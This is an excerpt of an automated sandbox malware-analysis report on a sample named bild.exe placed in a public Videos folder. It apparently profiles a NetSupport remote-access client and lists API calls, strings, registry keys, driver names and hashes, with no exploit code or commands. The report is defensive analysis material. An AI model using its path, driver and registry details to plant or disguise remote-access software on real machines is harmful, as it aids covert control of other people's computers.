                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeaveSleep
                                                                                    • String ID: Push
                                                                                    • API String ID: 1566154052-4278761818
                                                                                    • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                    • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                    • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                    • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                    Function 002D1020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCommandLineA.KERNEL32 ref: 002D1027
                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 002D107B
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 002D1096
                                                                                    • ExitProcess.KERNEL32 ref: 002D10A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4157770634.00000000002D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002D0000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4157702071.00000000002D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4157805406.00000000002D2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_2d0000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                    • String ID:
                                                                                    • API String ID: 2164999147-0
                                                                                    • Opcode ID: 6af17bb54ccc186710673de5a1aad54bd8ed6a6b9ac8d0211afecfaff4581e06
                                                                                    • Instruction ID: 91f5960a4a91ce1561f3094c7f764e53779f42b32541424a9175aadfd4a41f93
                                                                                    • Opcode Fuzzy Hash: 6af17bb54ccc186710673de5a1aad54bd8ed6a6b9ac8d0211afecfaff4581e06
                                                                                    • Instruction Fuzzy Hash: E01108208143C6BAFB31BFA085487EABF955F22383F240046DDD596746C2524CF7C760
                                                                                    Function 110306E7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                    • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 1314093303-0
                                                                                    • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                    • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                    • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                    • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                    Function 11143C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                    • String ID: C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                    • API String ID: 2251294070-1016564174
                                                                                    • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                    • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                    • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                    • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                    Function 1110F4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 1110F4A9
                                                                                      • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                      • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                      • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                    • _memset.LIBCMT ref: 1110F4D2
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                    • String ID: ..\ctl32\Refcount.cpp
                                                                                    • API String ID: 2803934178-2363596943
                                                                                    • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                    • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                    • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                    • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                    Function 11014FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle
                                                                                    • String ID: \\.\NSWFPDrv
                                                                                    • API String ID: 3498533004-85019792
                                                                                    • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                    • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                    • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                    • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                    Function 1115BDE0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _calloc
                                                                                    • String ID:
                                                                                    • API String ID: 1679841372-0
                                                                                    • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                    • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                    • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                    • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                    Function 11111430 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                    • __wsplitpath.LIBCMT ref: 11111475
                                                                                      • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                    • String ID:
                                                                                    • API String ID: 1847508633-0
                                                                                    • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                    • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                    • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                    • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                    Function 1109E9E0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                      • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                      • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                      • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,00A1ECC8,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                      • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00A1ECC8,?,00000001,00000001), ref: 1109E9A3
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2256153495-0
                                                                                    • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                    • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                    • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                    • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                    Function 11068950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: ??CTL32.DLL
                                                                                    • API String ID: 1029625771-2984404022
                                                                                    • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                    • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                    • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                    • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                    Function 11026B40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DriveType
                                                                                    • String ID: ?:\
                                                                                    • API String ID: 338552980-2533537817
                                                                                    • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                    • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                    • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                    • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                    Function 110ED1A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                    • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                      • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                    Strings
